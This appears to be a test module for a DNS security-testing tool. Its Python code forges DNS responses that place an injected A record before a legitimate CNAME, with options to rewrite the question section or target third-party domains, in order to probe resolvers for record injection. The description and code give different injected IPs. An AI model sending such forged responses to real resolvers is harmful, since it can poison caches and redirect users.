[module]
name = "inj02"
type = "feature"
info = "Injection 2 - CNAME with injected A record in the beginning"
desc = "Respond with injected A record (inj2poc.yourdomain.com -> 6.6.6.6) + legit CNAME (end.yourdomain.com)."
author = "ivan.jedek@oryxlabs.com"
category = "Record injections"

code = '''
if req.first_subdomain.startswith("inj02"):
   # Send 1 injected A record + 1 CNAME
   injip = "6.6.6.2"
   enddom = "end." + req.sld_tld_domain
   addedquestions = b''
   if "3rdparty" in req.subdomains:  # inject a 3rd party domain
      injdom = "injected02." + a3rdparty_domain
   else:
      injdom = "injected02." + req.sld_tld_domain
   ### QUESTION SECTION ########
   if "replq" in req.subdomains:  # replace the question with our injected stuffs
      orig_req_domain = req.full_domain
      req.full_domain = injdom
      addcustomlog("REPLQ")
   if "addq" in req.subdomains:  # add additional question for our injected stuffs
      resp.QURR = req.QURR+1
      addedquestions  = convDom2Bin(injdom) + req.type_bin + req.class_bin
      addcustomlog("ADDQ")
   ### DNS header ########
   buffer = prep_dns_header(b'\x84\x00', resp.QURR, 2, 0, 0)
   ### QUESTION SECTION ########
   if resp.noq: buffer += convDom2Bin(req.full_domain) + req.type_bin + req.class_bin
   buffer += addedquestions
   ### ANSWER SECTION ########
   # injected A
   buffer += convDom2Bin(injdom) + getTypeBin("A") + getClassBin("IN")
   buffer += struct.pack(">L", resp.TTL)                ## TTL
   buffer += struct.pack(">H", 4)                       ## Data length
   buffer += socket.inet_aton(injip)                    ## IP
   # CNAME
   buffer += b'\xc0\x0c' if resp.compress else convDom2Bin(req.full_domain)
   buffer += getTypeBin("CNAME") + getClassBin("IN")
   buffer += struct.pack(">L", resp.TTL)                ## TTL
   buffer += struct.pack(">H", len(enddom)+2)           ## Data length
   buffer += convDom2Bin(enddom)                        ## CNAME value
   # log and send
   log("A %s (%s) + CNAME %s" % (injdom, injip, enddom))
   send_buf(self, buffer)
   #####################################################################
'''
